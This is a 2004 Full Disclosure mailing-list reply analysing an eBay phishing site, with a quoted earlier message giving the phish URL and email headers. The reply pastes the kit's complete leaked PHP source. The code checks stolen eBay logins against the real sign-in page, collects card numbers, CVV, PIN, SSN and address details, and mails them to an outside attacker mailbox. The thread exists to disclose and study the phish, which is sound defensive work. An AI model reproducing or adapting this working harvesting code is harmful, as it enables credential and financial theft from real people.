Full Disclosure mailing list archives
RE: phish
From: "Andrew Poodle" <andrewp () IRW co uk>
Date: Mon, 8 Nov 2004 10:44:07 -0000
Not a very good one.. Submitting with an empty field displayed the raw PHP code.. Seems to send to mail("ebaynix () yahoo com","$userid","$userid $pass"); Below.. ----------------------8<------------------------------- <?php function query_str ($params) { $str = ''; foreach ($params as $key => $value) { $str .= (strlen($str) < 1) ? '' : '&'; $str .= $key . '=' . rawurlencode($value); } return ($str); } parse_str($HTTP_SERVER_VARS['QUERY_STRING']); if($MfcISAPICommand=="SignInFPP"){ include 'login.php'; } elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){ $a = query_str ($HTTP_POST_VARS); parse_str($a); $userid=str_replace(" ","",$userid); $pass=str_replace(" ","",$pass); $fd = fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignI nWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&us erid=$userid&pass=$pass","r"); while ($line=fgets($fd,1000)) { if(strstr($line,"not valid")) $signerr=1; if(strstr($line,"Your User ID is not valid")) $signerr=2; } fclose ($fd); if($signerr) include 'login.php'; else{ mail("ebaynix () yahoo com","$userid","$userid $pass"); include 'step1.php'; } } elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){ include 'step2.php'; } elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){ $a = query_str ($HTTP_POST_VARS); parse_str($a); $firstname = rtrim($firstname); $lastname = rtrim($lastname); $street = rtrim($street); $city = rtrim($city); $zip = rtrim($zip); $dayphone12 = rtrim($dayphone12); $dayphone22 = rtrim($dayphone22); $dayphone32 = rtrim($dayphone32); $dayphone42 = rtrim($dayphone42); $error = 0; if (!strlen($firstname)){ $error = 1; $firstnameerr = 1; } if (!strlen($lastname)){ $error = 1; $lastnameerr = 1; } if (!strlen($street)){ $error = 1; $streeterr = 1; } if (!strlen($city)){ $error = 1; $cityerr = 1; } /*if ($state == "default"){ $error = 1; $rstateerr = 1; } */ if (!strlen($zip) && !is_numeric($zip)){ $error = 1; $ziperr = 1; } if (!strlen($dayphone12)){ $error = 1; $dayphone12err = 1; } if (!strlen($dayphone22)){ $error = 1; $dayphone22err = 1; } if (!strlen($dayphone32)){ $error = 1; $dayphone32err = 1; } if(strlen($ssn)<1){ $error=1; $ssnerr=1; } if ($error == 1) include 'step2.php'; else include 'step3.php'; } elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){ $a = query_str ($HTTP_POST_VARS); parse_str($a); $ccnumber = rtrim($ccnumber); $ccmonth = rtrim($ccmonth); $ccyear = rtrim($ccyear); $cvv = rtrim($cvv); $pin = rtrim($pin); $error = 0; $a = substr($ccnumber,0,1); if($a == "3"){ if (strlen($cvv) != 4){ $error = 1; $cvverr = 1; } } elseif($a == "4"){ if (strlen($cvv) != 3){ $error = 1; $cvverr = 1; } } elseif($a == "5"){ if (strlen($cvv) != 3){ $error = 1; $cvverr = 1; } } elseif($a == "6"){ if (strlen($cvv) != 3){ $error = 1; $cvverr = 1; } } else{ $error = 1; $ccnumbererr = 1;} if(strlen($ccnumber)!=16){ $error=1; $ccnumbererr=1; } //ccmonth si ccyear; if(!strcmp($pin,"1234")||!strcmp($pin,"0000")){ $pinerr=1; $error=1; } if(strlen($pin)<4){ $pinerr=1; $error=1; } if($error==1) include 'step3.php'; else{ $message="------------------------------------------------------- -=::: Login Info :::=- user: $userid pass: $pass e-mail: $email -=::: Credit Card Info :::=- Credit Card Number: $ccnumber Expiration Date: $ccmonth/$ccyear CVV2: $cvv PIN: $pin Full Name: $firstname $lastname Address: $street City: $city State: $state Zip: $zip Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42 Country: $country SSN: $ssn "; mail("ebaynix () yahoo com","Fullinfo: $ccnumber","$message"); include 'process.htm'; } } elseif ($MfcISAPICommand=="SuccessfullFPP") include 'success.htm'; else include 'error.htm'; ?> ---------------------------------------------------------------- -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of D B Sent: 08 November 2004 10:21 To: full-disclosure () lists netsys com Subject: [Full-disclosure] phish another ebay phish http://www.ebay-verifications.biz/ws2/ header X-Apparently-To: geggam692000 () yahoo com via 216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800 X-YahooFilteredBulk: 66.139.79.218 X-Originating-IP: [66.139.79.218] Return-Path: <apache () www2 triasite net> Received: from 66.139.79.218 (EHLO www2.triasite.net) (66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004 14:17:22 -0800 Received: (from apache@localhost) by www2.triasite.net (8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004 16:24:42 -0600 Date: Sun, 7 Nov 2004 16:24:42 -0600 Message-Id: <200411072224.iA7MOgr24317 () www2 triasite net> To: geggam692000 () yahoo com Subject: eBay Database Critical Update Notification! From: "eBay" <accounts () ebay com> Add to Address BookAdd to Address Book Reply-to: MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: 8bit Content-Length: 2058 __________________________________ Do you Yahoo!? Check out the new Yahoo! Front Page. www.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- phish D B (Nov 08)
- <Possible follow-ups>
- RE: phish Andrew Poodle (Nov 08)